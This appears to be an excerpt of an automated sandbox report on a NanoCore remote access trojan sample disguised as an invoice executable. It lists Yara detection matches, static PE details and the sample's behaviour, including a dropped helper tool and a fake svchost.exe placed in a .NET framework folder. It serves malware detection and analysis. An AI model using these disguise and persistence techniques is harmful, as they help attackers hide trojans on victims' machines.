        Source: Yara matchFile source: 13.2.CasPol.exe.3b3b14e.3.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 12.2.svchost.exe.45bd7e0.8.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 12.2.svchost.exe.458a9c0.7.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0.2.CN-Invoice-XXXXX9808-19011143287994.exe.44b40f0.7.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 19.2.svchost.exe.6a65720.10.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 12.2.svchost.exe.45bd7e0.8.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 19.2.svchost.exe.6a98540.11.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0.2.CN-Invoice-XXXXX9808-19011143287994.exe.44812d0.6.raw.unpack, type: UNPACKEDPE

        System Summary:

        barindex
        Malicious sample detected (through community Yara rule)Show sources
        Source: 0000000D.00000002.913372093.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 0000000D.00000002.913372093.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000000.00000002.933305854.0000000004481000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000000.00000002.933305854.0000000004481000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 0000000D.00000002.951074840.00000000051C0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 0000000D.00000002.945545205.0000000003B39000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 0000000D.00000002.949065366.0000000004EE0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000013.00000002.972750680.0000000006A65000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000013.00000002.972750680.0000000006A65000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 0000000C.00000002.955915936.000000000458A000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 0000000C.00000002.955915936.000000000458A000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: Process Memory Space: CN-Invoice-XXXXX9808-19011143287994.exe PID: 2016, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: Process Memory Space: CN-Invoice-XXXXX9808-19011143287994.exe PID: 2016, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: Process Memory Space: CasPol.exe PID: 4228, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: Process Memory Space: CasPol.exe PID: 4228, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: Process Memory Space: svchost.exe PID: 4184, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: Process Memory Space: svchost.exe PID: 4184, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 13.2.CasPol.exe.3b3ff84.2.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 0.2.CN-Invoice-XXXXX9808-19011143287994.exe.44812d0.6.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 0.2.CN-Invoice-XXXXX9808-19011143287994.exe.44812d0.6.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 13.2.CasPol.exe.3b3ff84.2.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 13.2.CasPol.exe.51c0000.7.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 13.2.CasPol.exe.4ee0000.6.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 13.2.CasPol.exe.51c4629.8.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 13.2.CasPol.exe.51c0000.7.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 13.2.CasPol.exe.3b445ad.4.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 13.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 13.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 19.2.svchost.exe.6a98540.11.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 19.2.svchost.exe.6a98540.11.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 0.2.CN-Invoice-XXXXX9808-19011143287994.exe.44b40f0.7.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 0.2.CN-Invoice-XXXXX9808-19011143287994.exe.44b40f0.7.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 19.2.svchost.exe.6a65720.10.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 19.2.svchost.exe.6a65720.10.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 12.2.svchost.exe.458a9c0.7.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 12.2.svchost.exe.458a9c0.7.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 13.2.CasPol.exe.3b3b14e.3.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 13.2.CasPol.exe.3b3b14e.3.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 12.2.svchost.exe.45bd7e0.8.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 12.2.svchost.exe.45bd7e0.8.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 12.2.svchost.exe.458a9c0.7.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 12.2.svchost.exe.458a9c0.7.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 0.2.CN-Invoice-XXXXX9808-19011143287994.exe.44b40f0.7.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 0.2.CN-Invoice-XXXXX9808-19011143287994.exe.44b40f0.7.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 19.2.svchost.exe.6a65720.10.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 19.2.svchost.exe.6a65720.10.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 12.2.svchost.exe.45bd7e0.8.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 12.2.svchost.exe.45bd7e0.8.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 19.2.svchost.exe.6a98540.11.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 19.2.svchost.exe.6a98540.11.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 0.2.CN-Invoice-XXXXX9808-19011143287994.exe.44812d0.6.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 0.2.CN-Invoice-XXXXX9808-19011143287994.exe.44812d0.6.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Executable has a suspicious name (potential lure to open the executable)Show sources
        Source: CN-Invoice-XXXXX9808-19011143287994.exeStatic file information: Suspicious name
        Initial sample is a PE file and has a suspicious nameShow sources
        Source: initial sampleStatic PE information: Filename: CN-Invoice-XXXXX9808-19011143287994.exe
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exeCode function: 0_2_08A269B0 NtSetInformationThread,
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exeCode function: 0_2_08A27152 NtSetInformationThread,
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exeFile created: C:\Windows\Microsoft.NET\Framework\xrpSendfsxMJump to behavior
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exeCode function: 0_2_02D1C450
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exeCode function: 0_2_02D19BA8
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exeCode function: 0_2_08A20040
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exeCode function: 0_2_08A29A70
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exeCode function: 0_2_08A29338
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exeCode function: 0_2_08A28D40
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exeCode function: 0_2_08A20011
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exeCode function: 0_2_08C40040
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_033C3BB0
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_033C6258
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_033C8198
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_033C9F58
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_033C34D4
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_033C0040
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_03462038
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_03463058
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_034620E8
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_0346E548
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_03461B20
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_04E0C238
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_033C001E
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_033C4C78
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeCode function: 12_2_015EC6A8
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeCode function: 12_2_015EC6A3
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeCode function: 12_2_015E9BA8
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeCode function: 12_2_015E1D18
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeCode function: 12_2_06C20040
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeCode function: 12_2_06C20021
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeCode function: 12_2_06C28110
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeCode function: 12_2_09320040
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeCode function: 12_2_093255FE
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeCode function: 12_2_0932562E
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeCode function: 19_2_00AC0040
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeCode function: 19_2_00AC0006
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeCode function: 19_2_00AC8110
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeCode function: 19_2_00AC7B28
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeCode function: 19_2_04E4C450
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeCode function: 19_2_04E49BA8
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeCode function: 19_2_077C0040
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeCode function: 19_2_077C0007
        Source: C:\Users\user\AppData\Local\Temp\ad6ba6ad-9e3d-4fc8-98d0-88a6e198c3b3\AdvancedRun.exeCode function: String function: 0040B550 appears 50 times
        Source: unknownProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 2016 -ip 2016
        Source: CN-Invoice-XXXXX9808-19011143287994.exeStatic PE information: invalid certificate
        Source: AdvancedRun.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
        Source: AdvancedRun.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
        Source: AdvancedRun.exe.12.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
        Source: AdvancedRun.exe.12.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
        Source: AdvancedRun.exe.19.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
        Source: AdvancedRun.exe.19.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
        Source: CN-Invoice-XXXXX9808-19011143287994.exeBinary or memory string: OriginalFilename vs CN-Invoice-XXXXX9808-19011143287994.exe
        Source: CN-Invoice-XXXXX9808-19011143287994.exe, 00000000.00000002.848479319.0000000000BF2000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameNbTfoyms.exe2 vs CN-Invoice-XXXXX9808-19011143287994.exe
        Source: CN-Invoice-XXXXX9808-19011143287994.exe, 00000000.00000002.964968440.00000000065B0000.00000002.00000001.sdmpBinary or memory string: System.OriginalFileName vs CN-Invoice-XXXXX9808-19011143287994.exe
        Source: CN-Invoice-XXXXX9808-19011143287994.exe, 00000000.00000002.965514873.0000000006600000.00000002.00000001.sdmpBinary or memory string: originalfilename vs CN-Invoice-XXXXX9808-19011143287994.exe
        Source: CN-Invoice-XXXXX9808-19011143287994.exe, 00000000.00000002.965514873.0000000006600000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamepropsys.dll.mui@ vs CN-Invoice-XXXXX9808-19011143287994.exe
        Source: CN-Invoice-XXXXX9808-19011143287994.exe, 00000000.00000002.925195088.00000000042BD000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameRunPeBraba.dll6 vs CN-Invoice-XXXXX9808-19011143287994.exe
        Source: CN-Invoice-XXXXX9808-19011143287994.exe, 00000000.00000002.925195088.00000000042BD000.00000004.00000001.sdmpBinary or memory string: ,@shell32.dllSHGetSpecialFolderPathWshlwapi.dllSHAutoComplete%2.2X%2.2X%2.2X&lt;&gt;&quot;&deg;&amp;<br><font size="%d" color="#%s"><b></b>\StringFileInfo\\VarFileInfo\Translation%4.4X%4.4X040904E4ProductNameFileDescriptionFileVersionProductVersionCompanyNameInternalNameLegalCopyrightOriginalFileNameRSDSu vs CN-Invoice-XXXXX9808-19011143287994.exe
        Source: CN-Invoice-XXXXX9808-19011143287994.exe, 00000000.00000002.925195088.00000000042BD000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameAdvancedRun.exe8 vs CN-Invoice-XXXXX9808-19011143287994.exe
        Source: CN-Invoice-XXXXX9808-19011143287994.exe, 00000000.00000002.933305854.0000000004481000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameCngH Tzy.exe2 vs CN-Invoice-XXXXX9808-19011143287994.exe
        Source: CN-Invoice-XXXXX9808-19011143287994.exe, 00000000.00000002.949930173.0000000004EF0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamemscorrc.dllT vs CN-Invoice-XXXXX9808-19011143287994.exe
        Source: 0000000D.00000002.913372093.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0000000D.00000002.913372093.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000000.00000002.933305854.0000000004481000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000000.00000002.933305854.0000000004481000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0000000D.00000002.951074840.00000000051C0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0000000D.00000002.951074840.00000000051C0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 0000000D.00000002.945545205.0000000003B39000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0000000D.00000002.949065366.0000000004EE0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0000000D.00000002.949065366.0000000004EE0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 00000013.00000002.972750680.0000000006A65000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000013.00000002.972750680.0000000006A65000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0000000C.00000002.955915936.000000000458A000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0000000C.00000002.955915936.000000000458A000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: Process Memory Space: CN-Invoice-XXXXX9808-19011143287994.exe PID: 2016, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: Process Memory Space: CN-Invoice-XXXXX9808-19011143287994.exe PID: 2016, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: Process Memory Space: CasPol.exe PID: 4228, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: Process Memory Space: CasPol.exe PID: 4228, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: Process Memory Space: svchost.exe PID: 4184, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: Process Memory Space: svchost.exe PID: 4184, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 13.2.CasPol.exe.3b3ff84.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 13.2.CasPol.exe.3b3ff84.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 0.2.CN-Invoice-XXXXX9808-19011143287994.exe.44812d0.6.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0.2.CN-Invoice-XXXXX9808-19011143287994.exe.44812d0.6.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 0.2.CN-Invoice-XXXXX9808-19011143287994.exe.44812d0.6.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 13.2.CasPol.exe.3b3ff84.2.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 13.2.CasPol.exe.3b3ff84.2.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 13.2.CasPol.exe.51c0000.7.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 13.2.CasPol.exe.51c0000.7.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 13.2.CasPol.exe.4ee0000.6.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 13.2.CasPol.exe.4ee0000.6.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 13.2.CasPol.exe.51c4629.8.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 13.2.CasPol.exe.51c4629.8.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 13.2.CasPol.exe.51c0000.7.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 13.2.CasPol.exe.51c0000.7.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
